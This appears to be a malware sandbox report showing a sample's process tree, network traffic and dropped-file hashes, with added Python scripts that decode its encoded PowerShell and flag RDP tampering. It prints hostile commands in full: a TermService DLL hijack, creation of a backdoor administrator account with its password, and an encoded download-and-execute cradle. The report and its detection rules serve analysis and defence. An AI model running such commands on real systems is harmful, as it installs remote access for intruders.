PID 3684 wrote to memory of 4496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3684 wrote to memory of 4496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 812 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 812 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1396 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1396 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1808 wrote to memory of 1040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1808 wrote to memory of 1040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1040 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2500 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2500 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3240 wrote to memory of 3632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3240 wrote to memory of 3632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4064 wrote to memory of 4068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4064 wrote to memory of 4068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4068 wrote to memory of 3496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4068 wrote to memory of 3496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2352 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2352 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2844 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2844 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2080 wrote to memory of 4556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2080 wrote to memory of 4556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES970B.tmp" "c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 6letaiCK /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 6letaiCK /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 6letaiCK

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 6letaiCK

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

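The csc.exe and cvtres.exe invocations at the top of this list, with their random 8-character directory under %TEMP% (5drmgc1n.cmdline, 5drmgc1n.0.cs, 5drmgc1n.dll in the Files section), are the footprint of PowerShell's Add-Type compiling inline C#; the rest of the list is the part worth reading closely: the RDP listener is moved to 0x1C21 (7201 decimal), the TermService ServiceDLL is redirected to C:\Windows\branding\mediasrv.png, NT AUTHORITY\NETWORK SERVICE and a new account WgaUtilAcc are added to Administrators, WgaUtilAcc is also added to Remote Desktop Users, and an encoded PowerShell command is run under -ep bypass. The following Python is an added triage script, not part of the report or of any sandbox vendor's tooling: it decodes the -enc argument (base64 of UTF-16LE script text), parses the reg add data values, and runs a small set of rules over the command lines. The command lines are copied from the list above into a constructed sample; the rule names are this example's own, and the only assumption about a clean system is that TermService's ServiceDLL is %SystemRoot%\System32\termsrv.dll.

```python
import base64
import re

# Constructed sample for this example: command lines taken from the process
# list in the report above. The base64 blob is the -enc argument of the
# powershell.exe line, split across lines here only for readability.
ENC_BLOB = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)
ENC_CMDLINE = ("powershell -ep bypass -NoProfile -outputformat text -nologo "
               "-noninteractive -enc " + ENC_BLOB)

SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    "net.exe user WgaUtilAcc 6letaiCK /add",
    'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "wmic CPU get NAME",
    ENC_CMDLINE,
    r'"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f',
]

# Assumption (true for stock Windows): the Remote Desktop service DLL lives here.
# Anything else, and in particular a file that is not even a .dll, is a hijack.
CLEAN_TERMSRV = r"%systemroot%\system32\termsrv.dll"


def reg_add_data(cmdline):
    """Return the /d value of a `reg add` command line (quoted or bare), or None."""
    m = re.search(r'/d\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def rdp_port_from_cmdline(cmdline):
    """Decimal port set by a `reg add ... RDP-Tcp /v PortNumber` line, or None."""
    if not re.search(r"RDP-Tcp.*?/v\s+PortNumber", cmdline, re.I):
        return None
    data = reg_add_data(cmdline)
    return int(data, 0) if data else None  # int(x, 0) accepts both 0x1C21 and 7201


def termservice_dll_is_suspicious(path):
    """True unless the ServiceDLL is the stock termsrv.dll under System32."""
    normalized = path.lower().replace("c:\\windows", "%systemroot%")
    return normalized != CLEAN_TERMSRV


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -enc/-EncodedCommand argument, or None.
    PowerShell expects base64 of the UTF-16LE encoding of the script text."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


# Rule names are this example's own labels, not sandbox signature names.
SIMPLE_RULES = [
    ("rdp_port_changed", re.compile(r"RDP-Tcp.*?/v\s+PortNumber", re.I)),
    ("rdp_wddm_driver_disabled", re.compile(r"Terminal Services.*?/v\s+fEnableWddmDriver", re.I)),
    ("local_admin_added", re.compile(r'\bnet1?(?:\.exe)?"?\s+localgroup\s+"?Administrators"?\s+.*?/add', re.I)),
    ("local_user_created", re.compile(r'\bnet1?(?:\.exe)?"?\s+user\s+\S+\s+\S+\s+/add', re.I)),
    ("rdp_users_group_added", re.compile(r'localgroup\s+"Remote Desktop Users"\s+\S+\s+/add', re.I)),
    ("wmic_hardware_discovery", re.compile(r"\bwmic\b.*\b(?:win32_VideoController|cpu)\b.*\bget\b", re.I)),
    ("powershell_encoded_bypass", re.compile(r"powershell.*-ep\s+bypass.*-enc\s", re.I)),
    ("temp_script_cleanup", re.compile(r"\bdel\s+%temp%\\\*\.(?:ps1|txt)", re.I)),
]


def triage(cmdlines):
    """Return (rule, evidence) hits for RDP tampering, privilege grants and the cradle."""
    hits = []
    for line in cmdlines:
        for name, rx in SIMPLE_RULES:
            if rx.search(line):
                hits.append((name, line))
        # ServiceDLL needs the data value inspected, not just the key matched.
        if re.search(r"services\\TermService\\parameters.*?/v\s+ServiceDLL", line, re.I):
            data = reg_add_data(line)
            if data and termservice_dll_is_suspicious(data):
                hits.append(("termservice_servicedll_hijack", line))
        decoded = decode_encoded_command(line)
        if decoded and re.search(r"\bIEX\b|Invoke-Expression|downloadstring", decoded, re.I):
            hits.append(("powershell_download_cradle", decoded))
    return hits


if __name__ == "__main__":
    print("RDP port:", rdp_port_from_cmdline(SAMPLE_CMDLINES[0]))
    for rule, evidence in triage(SAMPLE_CMDLINES):
        print(f"{rule:32} {evidence[:100]}")
```

The -enc argument decodes to an IEX download cradle that fetches speed.ps1 from raw.githubusercontent.com, which is why raw.githubusercontent.com and the speedtest hosts appear in the Network table below. Any one of these rules alone is noisy (administrators do move the RDP port); the combination seen here, a moved RDP port, a ServiceDLL pointing at a .png under \Windows\Branding, NETWORK SERVICE and a fresh account in Administrators, and that account in Remote Desktop Users, is the pattern to alert on.
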
Network

Country  Destination           Domain                     Proto
US       52.109.8.20:443                                  tcp
US       8.8.8.8:53            raw.githubusercontent.com  udp
US       185.199.108.133:443   raw.githubusercontent.com  tcp
US       8.8.8.8:53            www.speedtest.net          udp
US       151.101.2.219:80      www.speedtest.net          tcp
US       151.101.2.219:443     www.speedtest.net          tcp
US       151.101.2.219:80      www.speedtest.net          tcp
US       8.8.8.8:53            c.speedtest.net            udp
US       151.101.2.219:443     c.speedtest.net            tcp
US       8.8.8.8:53            speedtest.claranet.nl      udp
NL       212.61.188.174:8080   speedtest.claranet.nl      tcp
US       8.8.8.8:53            speedtest.pixelhosting.nl  udp
NL       185.226.74.48:8080    speedtest.pixelhosting.nl  tcp
US       8.8.8.8:53            speedtest.init3.nl         udp
NL       185.161.141.201:8080  speedtest.init3.nl         tcp
US       8.8.8.8:53            sp1.jonaz.nl               udp
NL       185.47.134.254:8080   sp1.jonaz.nl               tcp
US       8.8.8.8:53            asfggagsa3.xyz             udp

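Read as pairs, the table tells a short story: each udp row to 8.8.8.8:53 is a lookup, and the tcp row that follows it is the connection to the resolved host. Every speedtest host that was looked up was then connected to (the .nl mirrors all on port 8080), which matches the speed.ps1 cradle in the command lines. Two rows break the pattern: 52.109.8.20:443 is connected to without any lookup in the capture, and asfggagsa3.xyz is looked up but no TCP connection to it appears at all. The following Python is an added example, not part of the report, that performs exactly that correlation over the rows above; the rows are copied into a constructed list, and the function and key names are this example's own.

```python
# Rows copied from the Network table above (constructed sample for this example):
# (country, destination ip:port, domain or "" where the report shows none, protocol).
NETWORK_ROWS = [
    ("US", "52.109.8.20:443", "", "tcp"),
    ("US", "8.8.8.8:53", "raw.githubusercontent.com", "udp"),
    ("US", "185.199.108.133:443", "raw.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "www.speedtest.net", "udp"),
    ("US", "151.101.2.219:80", "www.speedtest.net", "tcp"),
    ("US", "151.101.2.219:443", "www.speedtest.net", "tcp"),
    ("US", "151.101.2.219:80", "www.speedtest.net", "tcp"),
    ("US", "8.8.8.8:53", "c.speedtest.net", "udp"),
    ("US", "151.101.2.219:443", "c.speedtest.net", "tcp"),
    ("US", "8.8.8.8:53", "speedtest.claranet.nl", "udp"),
    ("NL", "212.61.188.174:8080", "speedtest.claranet.nl", "tcp"),
    ("US", "8.8.8.8:53", "speedtest.pixelhosting.nl", "udp"),
    ("NL", "185.226.74.48:8080", "speedtest.pixelhosting.nl", "tcp"),
    ("US", "8.8.8.8:53", "speedtest.init3.nl", "udp"),
    ("NL", "185.161.141.201:8080", "speedtest.init3.nl", "tcp"),
    ("US", "8.8.8.8:53", "sp1.jonaz.nl", "udp"),
    ("NL", "185.47.134.254:8080", "sp1.jonaz.nl", "tcp"),
    ("US", "8.8.8.8:53", "asfggagsa3.xyz", "udp"),
]


def summarize_network(rows):
    """Correlate DNS lookups (udp/53) with the TCP connections that followed.

    Returns a dict with:
      contacted:             domain -> sorted ip:port list it was connected to
      queried_no_connection: domains looked up but never connected to
      connected_no_lookup:   ip:port connected to with no domain in the capture
    """
    queried = []           # insertion-ordered, deduplicated
    contacted = {}
    connected_no_lookup = []
    for _country, dest, domain, proto in rows:
        if proto == "udp" and dest.endswith(":53") and domain:
            if domain not in queried:
                queried.append(domain)
        elif proto == "tcp":
            if domain:
                contacted.setdefault(domain, set()).add(dest)
            else:
                connected_no_lookup.append(dest)
    return {
        "contacted": {d: sorted(v) for d, v in contacted.items()},
        "queried_no_connection": [d for d in queried if d not in contacted],
        "connected_no_lookup": connected_no_lookup,
    }


def domains_on_port(rows, port):
    """Domains contacted over TCP on `port`, e.g. the port-8080 speedtest mirrors."""
    return sorted({domain for _c, dest, domain, proto in rows
                   if proto == "tcp" and domain and dest.endswith(f":{port}")})


if __name__ == "__main__":
    summary = summarize_network(NETWORK_ROWS)
    print("looked up, never connected:", summary["queried_no_connection"])
    print("connected, never looked up:", summary["connected_no_lookup"])
    print("port 8080 mirrors:", domains_on_port(NETWORK_ROWS, 8080))
```

A domain that is queried once and never connected to is the row to pivot on: in a sandbox that usually means the name did not resolve during the run, and a freshly registered or unresolved domain next to a pile of speedtest traffic is the candidate command-and-control host to block and hunt for, whereas the speedtest hosts are the bandwidth check the downloaded script performs.
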
Files

memory/4796-114-0x0000020AF8150000-0x0000020AF854F000-memory.dmp

memory/4796-117-0x0000020AF7D33000-0x0000020AF7D35000-memory.dmp

memory/4796-118-0x0000020AF7D35000-0x0000020AF7D36000-memory.dmp

memory/4796-116-0x0000020AF7D30000-0x0000020AF7D32000-memory.dmp

memory/4796-119-0x0000020AF7D36000-0x0000020AF7D37000-memory.dmp

memory/4936-120-0x0000000000000000-mapping.dmp

memory/4936-126-0x000002C66C2D0000-0x000002C66C2D1000-memory.dmp

memory/4936-129-0x000002C66C320000-0x000002C66C322000-memory.dmp

memory/4936-130-0x000002C66CD40000-0x000002C66CD41000-memory.dmp

memory/4936-131-0x000002C66C323000-0x000002C66C325000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/5104-137-0x0000000000000000-mapping.dmp

memory/4936-138-0x000002C66C326000-0x000002C66C328000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline

MD5 6847ea95f6502b5e247c4c9b15e7c550
SHA1 14560fa98b580e2bc61b540e882c4b189baa0548
SHA256 96af6a8c1909ba1870812eb4b50f7b5d1932393497ee0377e9304b33e2c91ac8
SHA512 c3123f104c73ef6d14a0fddd687df65b94b5b0f34b2385587ac7d52b90757d6c0c28dc4ec3a015837d52b10b58d0418877b0951d0d9f8a6b0a0459c600ab8abb

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3268-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP

MD5 848d49df70c48d0288cfed3e85b84033
SHA1 99d4922beb8d64ec5490aab9a79143f5666b79c8
SHA256 aa548d2b29250898debf642a921ad659d2f031f2dc27214da9342f2605d0a6f4
SHA512 e9f71be7fd42a84857088bf8e72b7e7aa40976178ff407eab35da865b9ee80ea645a773ab77e5b8285242d7491f73b67036d6d4688d7311440df3124a0d98c4f

C:\Users\Admin\AppData\Local\Temp\RES970B.tmp

MD5 43c612824034d372a2147adde8e768d0
SHA1 603eff8d1f3ea00ae0836e0a9f46c671fc312811
SHA256 28624f6137cc35cfd2fd921ff4ee270f94cd027a975cc0074ef21871d3768b3d
SHA512 60344a7dbcf8b1c2c5cfc2cc5d1c7ef76a8a194db7f228bb2cec0ac4311837f95ee38d6396ce9d0952fef247d8e3a173539095d72ec29992a46e424ee4193be9

C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.dll

MD5 8f1a77661d61dd4da6640eef43a23b8b
SHA1 5f5a64847dc0b47fc04e6d2f8bde97f021f03944
SHA256 52e29a6a3b4fe12c23d2c057f0228ccf720d50615a17bbcc3bba9fd11dd8bd59
SHA512 2588459bdf58e4ca34e1f07b21c7d7bc642d3ffb6c408f7cfccddb0b4e0d4bcd5d4802bbb28645ab17622ad95fa3d713ba1c9970680a40002fe7968a3946097d

memory/4936-145-0x000002C66C300000-0x000002C66C301000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9d21abc1a799ae0ea31258d563532295
SHA1 a9cde90ba328e30a3eb7a5c410b304a4ae09cdba
SHA256 8075e676d039b5791405f3ab00787a16199920dfe025ff04359b953565bf6f2f
SHA512 b9324c8b4af372a89aaa8c864dab88e74fdd820b28b6fe03897151e23de01b0a0857959e0e023340e4dd18ba0a6dad2faaf365580769b3a473070457b72b3065

memory/4936-149-0x000002C66C328000-0x000002C66C329000-memory.dmp

memory/4936-152-0x000002C66D310000-0x000002C66D311000-memory.dmp

memory/4936-153-0x000002C66D6A0000-0x000002C66D6A1000-memory.dmp

memory/3392-160-0x0000000000000000-mapping.dmp

memory/3392-166-0x00000230F2930000-0x00000230F2932000-memory.dmp

memory/3392-168-0x00000230F2933000-0x00000230F2935000-memory.dmp

memory/3392-176-0x00000230F2936000-0x00000230F2938000-memory.dmp

memory/416-205-0x0000000000000000-mapping.dmp

memory/3392-215-0x00000230F2938000-0x00000230F293A000-memory.dmp

memory/416-218-0x0000027676463000-0x0000027676465000-memory.dmp

memory/416-216-0x0000027676460000-0x0000027676462000-memory.dmp

memory/1100-246-0x0000000000000000-mapping.dmp

memory/416-257-0x0000027676466000-0x0000027676468000-memory.dmp

memory/416-258-0x0000027676468000-0x000002767646A000-memory.dmp

memory/1100-259-0x000002477A720000-0x000002477A722000-memory.dmp

memory/1100-260-0x000002477A723000-0x000002477A725000-memory.dmp

memory/1100-290-0x000002477A726000-0x000002477A728000-memory.dmp

memory/1100-291-0x000002477A728000-0x000002477A72A000-memory.dmp

memory/4716-307-0x0000000000000000-mapping.dmp

memory/3344-308-0x0000000000000000-mapping.dmp

memory/3340-309-0x0000000000000000-mapping.dmp

memory/4104-346-0x0000000000000000-mapping.dmp

memory/1008-347-0x0000000000000000-mapping.dmp

memory/3604-350-0x0000000000000000-mapping.dmp

memory/3708-351-0x0000000000000000-mapping.dmp

memory/2884-352-0x0000000000000000-mapping.dmp

memory/4260-353-0x0000000000000000-mapping.dmp

memory/740-354-0x0000000000000000-mapping.dmp

memory/3848-355-0x0000000000000000-mapping.dmp

memory/3940-356-0x0000000000000000-mapping.dmp

memory/3440-357-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 2997902dba8aefe9e872b14c2bfb584b
SHA1 cca608ebdde64a12dca56b2bd4864089857eba01
SHA256 537ab9c5f678410f21c063f11f4a894cc15025a5590199716a01bbf365dc0e50
SHA512 4fc959cbf5bebfcb5a32fdebd2ceec8943f9d3d0ffcaed236b2d73b680c5c5f6c85d5ad3d192d7d565f4b2fe07fb87321a8036a304147df2b7f45936ff5f9fc1

\Windows\Branding\mediasvc.png

MD5 9119f61ba0d487585a8fd5aaa4198a9a
SHA1 1ff2e337e5d1547d9e1824062500f743aae999db
SHA256 6a3da788a78fc2024fbfb135624047a7d15edcae3798a3cb0e87fbab740d70f1
SHA512 322e3e0006a3015c0495b76bdf9125285e6a6dd2f84d69996e4d95cbc73449269b7945ccccad465d417394075bc69f46f91ad1eb95f717958977cb88139267ab

memory/3684-360-0x0000000000000000-mapping.dmp

memory/4496-361-0x0000000000000000-mapping.dmp

memory/1396-362-0x0000000000000000-mapping.dmp

memory/1524-363-0x0000000000000000-mapping.dmp

memory/1040-364-0x0000000000000000-mapping.dmp

memory/580-365-0x0000000000000000-mapping.dmp

memory/3240-366-0x0000000000000000-mapping.dmp

memory/3632-367-0x0000000000000000-mapping.dmp

memory/4068-368-0x0000000000000000-mapping.dmp

memory/3496-369-0x0000000000000000-mapping.dmp

memory/2844-370-0x0000000000000000-mapping.dmp

memory/4076-371-0x0000000000000000-mapping.dmp

memory/4556-372-0x0000000000000000-mapping.dmp

memory/5052-373-0x0000000000000000-mapping.dmp

memory/5068-374-0x0000000000000000-mapping.dmp

memory/5068-387-0x000001FA79DE3000-0x000001FA79DE5000-memory.dmp

memory/5068-386-0x000001FA79DE0000-0x000001FA79DE2000-memory.dmp

memory/5068-390-0x000001FA79DE6000-0x000001FA79DE8000-memory.dmp

memory/5068-429-0x000001FA79DE8000-0x000001FA79DE9000-memory.dmp

memory/1216-442-0x0000000000000000-mapping.dmp

memory/1828-443-0x0000000000000000-mapping.dmp